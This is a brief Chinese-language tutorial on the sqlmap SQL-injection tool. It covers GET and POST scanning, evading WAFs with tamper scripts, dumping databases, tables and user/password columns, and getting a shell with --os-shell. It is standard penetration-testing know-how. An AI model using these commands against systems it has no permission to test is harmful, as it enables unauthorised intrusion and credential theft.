sqlmap是檢測sql注入神器,介紹一下sqlmap的快速上手掃描過程和參數���。
運行環境為kali
get方式
首先是get方式傳值情況,需要把傳輸數據名一起帶上,如:?id=1
簡單指令為:sqlmap -u 'http://xxxxxxxxxx?id=1'
post方式
post方式需要先導出為文本文件,以包的方式測試注入
首先使用抓包工具捕獲數據包,這里使用burp抓包,右鍵導出數據包保存為txt
保存后鍵入命令:sqlmap -r /root/post.txt /root/post.txt為導出的數據包����。
執行后即可驗證是否存在sql注入
sqlmap的繞過防護設備
使用 --tamper引用替換方式繞過
使用方式為鍵入sqlmap -u 'http://xxxxxx' --tamper=xxxx.py
xxxx.py的選擇需要根據數據庫類型,防護設備規則來選擇,sqlmap自帶了一些繞過腳本,可打開tamper目錄或者鍵入sqlmap --list-tampers查看
最好摸索規則自己編寫繞過腳本
sqlmap常用功能
檢測到注入點后最常用的就是爆數據庫
上述參數后加 --dbs --tables --colmus --dump逐級深入
--dbs獲取全部數據庫
-D XXX --tables 獲取xxx數據庫里的表
-D xxx -T sss --columns 獲取XXX表里的SSS字段
-D xxx -T sss -C “user,password” 獲取字段user,password里的數據
再提一個 --os-shell 網站權限有寫的權限可以生成一個上傳點
上述內容就是什么是sqlmap,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注本站行業資訊頻道����。
